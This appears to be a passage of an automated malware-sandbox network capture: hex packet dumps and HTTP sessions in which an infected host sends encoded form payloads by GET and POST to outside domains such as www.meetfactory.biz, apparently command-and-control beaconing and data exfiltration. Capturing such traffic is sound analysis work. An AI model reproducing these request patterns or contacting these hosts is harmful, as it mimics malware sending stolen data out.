                                                                                                                                                                                                                                                              Data Raw: 53 46 01 41 11 a9 49 3f 04 54 04 c6 4d 7c ac f3 7c ff 99 a9 7d 67 e9 72 7a 86 2b 16 e1 00 20 00 ae 22 43 f5 77 9c 5e 5c 93 4c ba e2 e4 6f b1 4b 03 91 90 04 9b 22 39 00 b4 b8 d9 fc ff fd a5 d5 64 a6 59 86 10 90 64 b7 b4 04 1c da f7 de f7 5e f7 87 aa 3d bf 04 b3 25 c9 3a a7 24 79 f6 c8 d0 7b 24 43 37 bf 77 1f fc 5f 28 36 e3 82 ed 21 c0 2c 58 c4 24 d9 24 ae e1 f2 f4 c2 00 85 13 6f 44 41 94 ec 63 98 d6 6e 7f 9f 75 d7 25 88 88 8a 80 9a b4 f7 12 97 c7 e6 35 c1 52 8d f2 62 32 54 33 19 db ee 0f 07 4e 62 18 54 22 e1 ef ab 8c 59 7b a1 96 52 86 e3 28 89 ff cb 98 5a 36 dd 73 bf c8 49 78 6a 80 48 ac 8b 12 30 b8 9a 73 0d 98 74 f5 0a e9 8e fe 78 9c e3 60 ee 69 51 88 f7 91 0a e5 bc 5c 4b 3c 97 85 a5 80 c8 a1 dd 50 d4 55 51 0f 11 48 30 65 70 a5 12 b8 f4 b7 78 51 00 46 dc e2 63 7a 71 50 97 dd 60 0c d2 21 a1 71 91 d4 78 11 98 92 0c 1c dc 0e 5d ef 81 63 11 14 df 3f 9e 10 25 dc 3d de d1 2f 77 9f 7f 7c df e7 d9 33 9b 7f 68 4d f7 0a 56 b7 d5 a2 e9 1c d2 eb d8 6a 5f ef 17 bb 6d 78 d6 61 a8 9c a2 07 d5 1e 5f 8f 47 af ac 9a [TRUNCATED]
                                                                                                                                                                                                                                                              Data Ascii: SFAI?TM||}grz+ "Cw^\LoK"9dYd^=%:$y{$C7w_(6!,X$$oDAcnu%5Rb2T3NbT"Y{R(Z6sIxjH0stx`iQ\K<PUQH0epxQFczqP`!qx]c?%=/w|3hMVj_mxa_GAO(7yHf^~d9[P3Y.jV">/Q{oFTFe+)+q=d)DG wu;~ whk}}W+To6zO[SZS\=UR&4jG8h9H)nN<Gto}5V{}B_.xQx*viD&LPioXUqHX;dWLtN8VI9V"m<((}?L#ygz4i/4}fQab]OTP0lUUUyL~#;r5+C^]tl~:6mtj}:JLU5:/WB}pU/H:|v&iw_7iAinZn:iSm.A:]L23m~
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:54.481236935 CEST1289INData Raw: 10 9e b0 14 44 ce bf ef 16 2a c6 a8 ad d0 ac 3f d0 b5 6a 0d ba aa c4 fc 5d fb 2d fc ab b7 af da ea 22 b3 1f eb 7e d0 37 37 aa 43 0a cf 71 71 f9 ae 06 8b 7e 29 d3 63 5f b7 db e6 3f be 2f ac 51 a0 72 5d 97 48 38 2e 8c a2 90 a0 d2 3c 0b 61 a2 2a 5b
                                                                                                                                                                                                                                                              Data Ascii: D*?j]-"~77Cqq~)c_?/Qr]H8.<a*[^x"nVo-u}+I_0t|? W^sp;kT8z"t8y|U||!K+M<kVS9F`_QqZ
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:54.481370926 CEST1289INData Raw: e7 81 3a f0 d7 ba 84 0a 55 b8 fb 14 3a 6f 95 f3 54 12 e8 1a 89 ee d7 a6 18 11 6e 6b 2b a2 bd 29 59 01 f7 5e f4 60 f1 45 08 b6 8c 58 9a c7 a7 9c f1 68 d9 26 2c 8d 22 7a f8 2c 20 98 14 29 2e cc 52 38 bd a8 fb 9c f1 f8 24 58 16 65 7f 88 88 c9 36 61
                                                                                                                                                                                                                                                              Data Ascii: :U:oTnk+)Y^`EXh&,"z, ).R8$Xe6aQpf,J;h2nE5N,qgc%[Tf\+1"ELD?w^ ii)?7N@%vq2x;!;7r184dC2
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:54.481704950 CEST1289INData Raw: 52 08 e6 fe b0 10 15 c2 7d e2 90 6e 69 6a 6a da 69 4b 65 83 63 78 19 ec cd 10 e1 06 26 b9 57 6b 18 1e e8 7c 72 41 62 5e f0 e6 72 72 c1 61 5e 34 3a e0 14 02 4b d5 79 3b 1e df 38 8b c5 01 e9 e8 1c 49 75 a7 08 93 75 93 db bf ef b6 b2 df ce 7c 80 c9
                                                                                                                                                                                                                                                              Data Ascii: R}nijjiKecx&Wk|rAb^rra^4:Ky;8Iuu|3Qs+R8e<cY9)woCa4s52QH;DUp-ErH~Lp4"439r<vXAPsTc|638PWmvcf-)IQ8=g<a#P
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:54.481720924 CEST1289INData Raw: 91 2a fc 09 d5 b7 b1 de 08 af a7 0c d6 3c ba 0b b8 ce 36 4d bd 49 5c 60 92 50 e8 c5 75 c3 a8 f0 d1 a3 bb 80 eb 5c 37 62 5b f3 37 28 28 40 e4 0c 14 3e 7a b4 14 70 bd dc 24 42 bb 13 ac 5c c0 a6 88 96 43 47 34 38 98 dd 77 b3 cc ba 3c 59 c0 b5 18 78
                                                                                                                                                                                                                                                              Data Ascii: *<6MI\`Pu\7b[7((@>zp$B\CG48w<Yx",>.Tk(^K\{"a]kuiM4|XYntPvQAJD)3"0w+>s "q&\Q(WJND'DDvb.'d"a}x8uHE
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:54.481946945 CEST1289INData Raw: f8 1c 20 1c 58 2e 69 bd a1 cc ab 13 83 f4 2a dc 26 13 25 ab b0 41 88 85 04 d4 a0 7c 3f d2 ca 73 ad 73 4c 61 bf 8d 43 81 bb c0 fb 80 c0 78 df 0e 27 8d 05 6b 3d 48 fe 0e da a9 21 02 dc 18 5a 96 52 66 70 dc c2 78 f1 c4 d1 98 6e 3a 5e fc 40 56 7a 3b
                                                                                                                                                                                                                                                              Data Ascii: X.i*&%A|?ssLaCx'k=H!ZRfpxn:^@Vz;fB8Tc<cQn"<fw3B~[/bvLcn_Coz`<[J{:wm*Y3pEz[EtofRcy4RkE+&?%Ill@H
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:54.482306004 CEST1289INData Raw: 6b 5e 67 c7 33 78 e8 e9 63 f4 fd 29 8e bf bb dd 9a dd 84 2c 6f 12 f6 3b 97 4f 21 c3 5a 9a 58 77 ef 7c e2 e1 a5 b9 c6 98 7f 64 96 5b 27 3e 01 1a 76 8e c0 0c 33 3a 74 fa 2e d9 1e f4 bf 76 eb 79 9d 7b 04 6e 9d bb f5 ee e2 4e 71 11 f0 93 0d 09 0a e1
                                                                                                                                                                                                                                                              Data Ascii: k^g3xc),o;O!ZXw|d['>v3:t.vy{nNqVK`nJM[+u76cd>lsLr)tPF$aPOXb_hp`XmKMyhVe%,m[a1}`3;E{?])#
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:54.482359886 CEST1289INData Raw: f7 80 3b 7b 99 79 9f 47 bc 96 5e 66 67 95 d7 0a 6c 2a 16 33 b2 9f 9a f5 a4 ad c6 d4 60 28 f0 b6 1d 52 f9 9d 7b 1e e8 8b eb 3b 12 bf ba c0 07 c7 af 8d f1 3f be 3d f0 09 de b8 39 e6 6f 8f 9f 22 9b 73 39 b4 76 a8 59 3f 1f d6 ba 86 df 71 82 da 85 7a
                                                                                                                                                                                                                                                              Data Ascii: ;{yG^fgl*3`(R{;?=9o"s9vY?qzO~y_mo 1g0Zzom6=g-yps3``]-E`O1'5lQ(;E/eatgC;)jod!a +a7is
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:54.482438087 CEST1289INData Raw: 10 22 08 e0 e8 f3 f4 d4 50 81 be e8 ee 88 a6 c5 4a 70 15 44 66 74 af 9c 2c 24 83 15 92 d2 84 c1 11 a0 cb e0 60 97 4f 51 1a 7a 8b d6 eb aa 38 15 d6 51 6f 1f 03 69 78 36 c3 7f b4 ef 68 79 5f a1 14 d7 ac 42 21 06 d5 98 60 01 60 1c fd da dd 07 02 6b
                                                                                                                                                                                                                                                              Data Ascii: "PJpDft,$`OQz8Qoix6hy_B!``kWFw}[/s9#jvH>vYV)}'f)NK>iB1e,q(D6WPc^2y}Q-NF4U$DLVZI3C


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              49192.168.11.2049798103.247.8.5380
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:56.824830055 CEST556OUTGET /21hf/?9B6h=p1NLRLDpZ3jtk0f1dDjC0GqGJiZBNtu8Mrwl5djJtNb21C4BFG2Hr75FPHHV9wORgBrIYOW3JrKZkRWCMOhawA9p/CCB70kTn7w94dWnlsSq4AnfR/ra/5E=&FlS=3ldH5dkH-dBLf HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.asa-malukuutara.com
                                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                                                                                                                                                                                                                              Oct 9, 2024 13:40:57.298561096 CEST521INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                              Date: Wed, 09 Oct 2024 11:40:57 GMT
                                                                                                                                                                                                                                                              Server: Apache
                                                                                                                                                                                                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                                                                              X-Redirect-By: WordPress
                                                                                                                                                                                                                                                              Upgrade: h2,h2c
                                                                                                                                                                                                                                                              Connection: Upgrade, close
                                                                                                                                                                                                                                                              Location: http://asa-malukuutara.com/21hf/?9B6h=p1NLRLDpZ3jtk0f1dDjC0GqGJiZBNtu8Mrwl5djJtNb21C4BFG2Hr75FPHHV9wORgBrIYOW3JrKZkRWCMOhawA9p/CCB70kTn7w94dWnlsSq4AnfR/ra/5E=&FlS=3ldH5dkH-dBLf
                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                              Content-Length: 0
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              50192.168.11.204979972.14.178.17480
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Oct 9, 2024 13:41:10.607431889 CEST820OUTPOST /o0e7/ HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.meetfactory.biz
                                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                                                                                                              Origin: http://www.meetfactory.biz
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Content-Length: 201
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Referer: http://www.meetfactory.biz/o0e7/
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                                                                                                                                                                                                                              Data Raw: 39 42 36 68 3d 38 46 47 42 68 55 63 56 59 46 6b 45 4d 67 4c 56 53 62 4e 55 74 42 64 75 63 59 56 55 51 64 49 78 42 51 42 6b 6c 55 49 78 54 36 64 66 63 34 52 30 6b 69 4c 33 67 6b 52 4f 6f 4c 64 74 71 57 6c 55 6f 77 78 43 35 49 38 46 6c 41 4f 71 41 5a 75 37 53 32 37 52 58 49 46 65 66 6e 37 42 71 47 4c 48 4b 56 4b 62 6f 30 4c 7a 33 59 41 74 68 36 56 72 63 70 55 61 6d 70 33 35 37 41 79 45 38 53 64 48 42 64 6f 4f 79 69 39 36 54 74 73 6c 51 68 49 67 77 30 68 2f 31 4e 56 35 61 68 4f 6b 7a 54 70 35 44 77 75 5a 6c 43 79 36 74 6f 74 6a 6a 56 61 62 6f 46 53 6e 6c 6d 77 71 51 4c 33 61 66 75 79 4d 6b 67 3d 3d
                                                                                                                                                                                                                                                              Data Ascii: 9B6h=8FGBhUcVYFkEMgLVSbNUtBducYVUQdIxBQBklUIxT6dfc4R0kiL3gkROoLdtqWlUowxC5I8FlAOqAZu7S27RXIFefn7BqGLHKVKbo0Lz3YAth6VrcpUamp357AyE8SdHBdoOyi96TtslQhIgw0h/1NV5ahOkzTp5DwuZlCy6totjjVaboFSnlmwqQL3afuyMkg==
                                                                                                                                                                                                                                                              Oct 9, 2024 13:41:10.741637945 CEST804INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              server: openresty/1.13.6.1
                                                                                                                                                                                                                                                              date: Wed, 09 Oct 2024 11:41:10 GMT
                                                                                                                                                                                                                                                              content-type: text/html
                                                                                                                                                                                                                                                              transfer-encoding: chunked
                                                                                                                                                                                                                                                              content-encoding: gzip
                                                                                                                                                                                                                                                              connection: close
                                                                                                                                                                                                                                                              Data Raw: 32 36 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 95 53 4d 73 9b 30 10 bd e7 57 50 0e 99 76 a6 36 1f 76 82 69 20 9d d4 8d 89 09 b1 93 d4 09 36 97 8c 90 14 4b 0e 48 04 04 98 74 fa df 0b b8 13 d3 71 2f d5 01 69 97 dd b7 fb de 4a d6 87 ef f3 f1 62 75 7b 29 11 11 47 e7 47 56 b3 49 11 60 6b 5b c6 4c 3e 3f 92 ea 65 11 0c d0 ee d8 9a 31 16 40 82 04 a4 19 16 b6 fc b0 98 f4 46 7f 22 f7 bf 89 10 49 0f bf e6 b4 b0 e5 6d 2f 07 3d c8 e3 04 08 1a 46 58 96 20 67 02 b3 3a 77 7a 69 63 b4 c6 07 d9 0c c4 d8 96 0b 8a cb 84 a7 a2 93 50 52 24 88 8d 70 41 21 ee b5 c6 67 89 32 2a 28 88 7a 19 04 11 b6 b5 be da 85 13 54 44 f8 dc 52 76 7b 4b a7 6d 92 f1 0c a6 34 11 7b 5a ff ee 3d c5 cf 29 ce 48 a7 05 f5 2c 4f 23 bb e1 f7 45 51 ca b2 34 d4 7e 8c b1 78 06 50 f0 b4 ea 87 f4 4d 91 25 65 8f 6b 29 87 b5 ac 56 c2 ae 46 87 75 4e fe a3 8e a5 ec 47 64 85 1c 55 12 67 11 07 c8 96 11 7f da 1d 3f 7e ea ca b2 23 2f 89 2a a9 75 16 78 2b 94 0d 28 c0 ce db 89 6b 34 79 ce 19 14 94 33 a9 03 25 fd 7c 57 b2 09 69 56 49 19 e2 65 5f f0 a4 1f 71 58 4f 9a [TRUNCATED]
                                                                                                                                                                                                                                                              Data Ascii: 264SMs0WPv6vi 6KHtq/iJbu{)GGVI`k[L>?e1@F"Im/=FX g:wzicPR$pA!g2*(zTDRv{Km4{Z=)H,O#EQ4~xPM%ek)VFuNGdUg?~#/*ux+(k4y3%|WiVIe_qXO>YI$:Nlx<}44j>4O 8}:qj0~szA=}TH]-]t<mm? m|.GW4@/`y/vLyx4JE!9Z9:dOT7 z@D8x- '*BjC4B-KH?HpMB&"'%g8hm3\S>k4-KxKiIB\0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              51192.168.11.204980072.14.178.17480
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Oct 9, 2024 13:41:13.279257059 CEST840OUTPOST /o0e7/ HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.meetfactory.biz
                                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                                                                                                              Origin: http://www.meetfactory.biz
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Content-Length: 221
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Referer: http://www.meetfactory.biz/o0e7/
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                                                                                                                                                                                                                              Data Raw: 39 42 36 68 3d 38 46 47 42 68 55 63 56 59 46 6b 45 4e 42 37 56 52 34 56 55 71 68 64 74 54 34 56 55 5a 39 49 39 42 51 4e 6b 6c 56 4e 38 54 73 31 66 64 63 56 30 6c 6a 4c 33 74 45 52 4f 67 72 64 6f 75 57 6b 35 6f 77 39 38 35 49 41 46 6c 41 79 71 41 62 6d 37 52 48 37 51 58 59 46 63 57 48 37 44 6c 6d 4c 48 4b 56 4b 62 6f 30 76 64 33 63 55 74 68 71 46 72 64 49 55 5a 36 5a 33 34 73 77 79 45 34 53 64 44 42 64 6f 38 79 67 5a 51 54 76 45 6c 51 6b 6b 67 77 41 31 38 2f 4e 55 54 58 42 50 57 79 7a 63 6e 61 6a 33 30 73 77 75 39 72 4c 52 44 76 6a 4c 42 31 33 6d 44 6d 31 73 59 55 37 4f 79 64 73 7a 58 35 76 2f 62 79 73 33 34 57 4d 54 6b 63 31 6b 43 6d 65 4c 59 42 6f 59 3d
                                                                                                                                                                                                                                                              Data Ascii: 9B6h=8FGBhUcVYFkENB7VR4VUqhdtT4VUZ9I9BQNklVN8Ts1fdcV0ljL3tEROgrdouWk5ow985IAFlAyqAbm7RH7QXYFcWH7DlmLHKVKbo0vd3cUthqFrdIUZ6Z34swyE4SdDBdo8ygZQTvElQkkgwA18/NUTXBPWyzcnaj30swu9rLRDvjLB13mDm1sYU7OydszX5v/bys34WMTkc1kCmeLYBoY=
                                                                                                                                                                                                                                                              Oct 9, 2024 13:41:13.412662983 CEST803INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              server: openresty/1.13.6.1
                                                                                                                                                                                                                                                              date: Wed, 09 Oct 2024 11:41:13 GMT
                                                                                                                                                                                                                                                              content-type: text/html
                                                                                                                                                                                                                                                              transfer-encoding: chunked
                                                                                                                                                                                                                                                              content-encoding: gzip
                                                                                                                                                                                                                                                              connection: close
                                                                                                                                                                                                                                                              Data Raw: 32 36 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 95 53 4d 73 9b 30 10 bd e7 57 50 0e 99 76 a6 e6 d3 09 76 03 e9 a4 6e 4c 4c 88 9d a4 4e b0 7d c9 08 49 b1 e4 80 44 40 80 49 a7 ff bd 80 3b 31 1d f7 52 1d 90 76 d9 7d bb ef ad 64 7f f8 3e 1b cd 97 b7 97 12 11 71 74 7e 64 37 9b 14 01 b6 76 64 cc e4 f3 23 a9 5e 36 c1 00 ed 8e ad 19 63 01 24 48 40 9a 61 e1 c8 0f f3 71 6f f0 27 72 ff 9b 08 91 f4 f0 6b 4e 0b 47 de f6 72 d0 83 3c 4e 80 a0 61 84 65 09 72 26 30 ab 73 27 97 0e 46 6b 7c 90 cd 40 8c 1d b9 a0 b8 4c 78 2a 3a 09 25 45 82 38 08 17 14 e2 5e 6b 7c 96 28 a3 82 82 a8 97 41 10 61 47 57 b4 2e 9c a0 22 c2 e7 b6 ba db 5b 3a 6d 93 8c 67 30 a5 89 d8 d3 fa 77 ef 29 7e 4e 71 46 3a 2d 68 67 79 1a 39 0d bf 2f aa 5a 96 a5 a5 29 31 c6 e2 19 40 c1 d3 4a 09 e9 9b 2a 4b ea 1e d7 56 0f 6b d9 ad 84 5d 8d 0e eb 9c fc 47 1d 5b dd 8f c8 0e 39 aa 24 ce 22 0e 90 23 23 fe b4 3b 7e fc d4 95 65 47 5e 12 55 52 eb 2c f0 56 a8 1b 50 80 9d b7 13 d7 68 f2 9c 33 28 28 67 52 07 4a fa f9 ae 64 13 d2 ac 92 32 c4 4b 45 f0 44 89 38 ac 27 cd 99 [TRUNCATED]
                                                                                                                                                                                                                                                              Data Ascii: 263SMs0WPvvnLLN}ID@I;1Rv}d>qt~d7vd#^6c$H@aqo'rkNGr<Naer&0s'Fk|@Lx*:%E8^k|(AaGW."[:mg0w)~NqF:-hgy9/Z)1@J*KVk]G[9$"##;~eG^UR,VPh3((gRJd2KED8'BjV#{G?d')rtffc.N@\y:_^P9.t26 m|GWd"hTMaq>~5x4k FC\=qm4om^}@0%aPZpde<xpM`V?'z#|v;ZpycNov9geo5>e70


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                              52192.168.11.204980172.14.178.17480
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Oct 9, 2024 13:41:15.950918913 CEST2578OUTPOST /o0e7/ HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.meetfactory.biz
                                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                                                                                                              Origin: http://www.meetfactory.biz
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Content-Length: 7369
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Referer: http://www.meetfactory.biz/o0e7/
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                                                                                                                                                                                                                              Data Raw: 39 42 36 68 3d 38 46 47 42 68 55 63 56 59 46 6b 45 4e 42 37 56 52 34 56 55 71 68 64 74 54 34 56 55 5a 39 49 39 42 51 4e 6b 6c 56 4e 38 54 73 39 66 64 70 42 30 6b 41 7a 33 73 45 52 4f 75 4c 64 70 75 57 6c 37 6f 78 56 77 35 49 4e 77 6c 46 32 71 53 70 65 37 55 30 6a 51 64 59 46 63 55 48 37 43 71 47 4b 61 4b 56 61 6c 6f 30 66 64 33 63 55 74 68 73 35 72 61 5a 55 5a 70 4a 33 35 37 41 79 49 38 53 64 37 42 5a 46 4a 79 67 64 71 53 66 6b 6c 54 45 30 67 6a 56 68 38 39 74 56 31 55 42 50 4f 79 7a 41 47 61 6a 36 59 73 78 61 58 72 4a 78 44 2b 43 2b 67 6f 79 47 5a 36 48 4d 30 58 2f 47 73 55 4e 2f 65 36 66 6e 48 36 75 54 4b 66 62 72 75 53 30 45 32 39 4d 62 62 51 63 6f 6a 31 64 62 5a 43 52 77 45 70 74 55 64 49 79 42 41 37 63 69 6f 65 6f 35 33 6d 6d 53 73 49 6d 5a 78 75 45 38 32 6c 57 2f 78 4c 31 51 4e 4b 37 6f 79 4d 33 48 74 52 65 54 67 4d 36 4c 67 49 6c 72 4d 4b 31 57 71 2f 4e 30 49 73 2b 4f 70 77 72 6b 46 49 62 70 32 42 4d 41 67 64 49 50 5a 52 56 34 59 57 37 34 75 34 6c 65 56 4d 77 44 6d 2f 4b 42 6b 4a 7a 71 61 71 [TRUNCATED]
                                                                                                                                                                                                                                                              Data Ascii: 9B6h=8FGBhUcVYFkENB7VR4VUqhdtT4VUZ9I9BQNklVN8Ts9fdpB0kAz3sEROuLdpuWl7oxVw5INwlF2qSpe7U0jQdYFcUH7CqGKaKValo0fd3cUths5raZUZpJ357AyI8Sd7BZFJygdqSfklTE0gjVh89tV1UBPOyzAGaj6YsxaXrJxD+C+goyGZ6HM0X/GsUN/e6fnH6uTKfbruS0E29MbbQcoj1dbZCRwEptUdIyBA7cioeo53mmSsImZxuE82lW/xL1QNK7oyM3HtReTgM6LgIlrMK1Wq/N0Is+OpwrkFIbp2BMAgdIPZRV4YW74u4leVMwDm/KBkJzqaqG74IbLUolpkgTUCwOKnrS/adpIQXyeljqaDFEMrwQTeYikfKtROTerQEpnoR1KYpJ8qaSd7Of5aiGvzf69xWdRXmCs31q2B251YHLnQIqMjY1JiWPPnlastlasnx667fK3dt7o7+P15GWZxDZVT/fnsI9yhVoJWyXnx8bT3ApNIchpDktIR25AuswbGGfPA0GYxMwpZsiMv3HeVDjRIkTvhtdtqXFAbax51QEw0+0dVQ3bzkRCCsC3w9axFbkyC3v7ijrYeSF7S5GSnRMG+9XmvQPHkw3zZ3c12fM4urklbX/v7GyNDdJHg2LLfnwo1yy20OQFfP6p/a4vM5BCUwTJL35Iry96kCT6JeWvKXwYBgYudGAl2PP9y6daFXsKd1OaWZOSUvN89VPCBM00ppMAzVLqXWMsrfY4TmBkkBkl5j9RzXXZx7jb3ZwwEhefUyMtKEtX1AOB73AAioltSjH9zdo1KMpb+qsmFzDGB9TY3dpisAglMA1dNZnu/zaFqXZyXSI8oIL7sK3ayVQVLW6tfhnObETNYI8cwhSGKb+5rWvmphdTCg6xG2h+AZDniRhtihmMsSEE44wEBcECyhgQmp7TM8UrGJo1ETFqYkJRw4Vb3cdA2qa3OaoJI1JB5R8+oQfJbdYEbJjYwiRz3xYg1QyjsUp1olp+ [TRUNCATED]
                                                                                                                                                                                                                                                              Oct 9, 2024 13:41:15.950939894 CEST5156OUTData Raw: 35 57 74 35 51 68 52 4a 62 54 6f 4b 36 2b 6b 37 5a 76 34 35 52 4d 38 63 72 34 4c 38 72 56 47 6f 79 46 56 55 36 42 34 58 46 41 6a 61 45 31 4f 38 33 4e 70 65 53 63 4d 75 75 4b 6b 4b 7a 49 69 6a 43 7a 46 69 59 4b 33 57 6e 64 35 79 67 4b 51 79 4c 31
                                                                                                                                                                                                                                                              Data Ascii: 5Wt5QhRJbToK6+k7Zv45RM8cr4L8rVGoyFVU6B4XFAjaE1O83NpeScMuuKkKzIijCzFiYK3Wnd5ygKQyL1ec7VEhjgAWK5cdF+PEkuE7EKWmCbe9O75wXTbA/w1c1QJFtyk7GhHu3BlbwUiKpwvq2cI0+5JQSyvG7mEZhqpklNcmUVzy2dR8sx/GgUoyjVm945CX7tjNS6j66MTVT3sV95nq550dF8oYPX+IzFFZU8YxF5uNEaJ
                                                                                                                                                                                                                                                              Oct 9, 2024 13:41:15.950992107 CEST255OUTData Raw: 6b 43 4b 75 44 61 61 36 65 45 55 47 6a 76 57 57 58 61 66 72 2f 67 7a 4c 61 37 30 2b 30 67 65 48 4b 31 30 56 76 62 6f 65 68 48 47 30 76 57 35 70 37 6c 74 43 44 61 42 63 7a 6f 48 4a 63 52 6f 46 43 52 62 4d 39 45 79 55 67 51 68 70 57 51 64 67 45 68
                                                                                                                                                                                                                                                              Data Ascii: kCKuDaa6eEUGjvWWXafr/gzLa70+0geHK10VvboehHG0vW5p7ltCDaBczoHJcRoFCRbM9EyUgQhpWQdgEh31XaNTamiriTOSrGkJBkJR6g45lN645d2MbbEti5x3BV9I/rRLSRo9VogA58zlStlux4p67phhocUA7m2yRyUhdscW8GCfckjYd/+PfeAY1ruZn7XmQesgnGvk0gmKqu74Qg/XkxDsvyJiUU/d6UL15+UgK2nqGzj
                                                                                                                                                                                                                                                              Oct 9, 2024 13:41:16.085145950 CEST803INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              server: openresty/1.13.6.1
                                                                                                                                                                                                                                                              date: Wed, 09 Oct 2024 11:41:16 GMT
                                                                                                                                                                                                                                                              content-type: text/html
                                                                                                                                                                                                                                                              transfer-encoding: chunked
                                                                                                                                                                                                                                                              content-encoding: gzip
                                                                                                                                                                                                                                                              connection: close
